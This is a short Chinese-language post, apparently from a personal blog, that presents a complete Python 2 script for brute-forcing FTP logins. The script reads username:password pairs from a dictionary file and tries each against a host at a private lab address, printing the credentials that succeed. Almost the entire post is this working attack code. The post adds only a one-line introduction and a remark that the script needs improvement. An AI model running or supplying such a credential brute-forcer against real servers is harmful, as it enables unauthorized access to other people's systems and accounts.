思路主要还是使用FTP用户名与密码字典对FTP进行登录的破解
具体的代码如下:
#encoding:utf-8
import ftplib
def brutelogin(hostname,passwdFile):
pF=open(passwdFile,'r')
for line in pF.readlines():
userName=line.split(':')[0]
passWord=line.split(':')[1].strip('\r').strip('\n')
print "[+] Trying:"+userName+"/"+passWord
try:
ftp=ftplib.FTP(hostname)
ftp.login(userName,passWord)
print '\n[*]'+str(hostname)+'FTP login Succeeded:'+userName+'/'+passWord
ftp.quit()
return (userName,passWord)
except Exception,e:
pass
print '\n[-] Could not brute force FTP credentials.'
return (None,None)
host='192.168.11.138'
passWdFile='userpass.txt'
brutelogin(host,passWdFile)
运行结果:
这个仍然有美中不足,有待改进!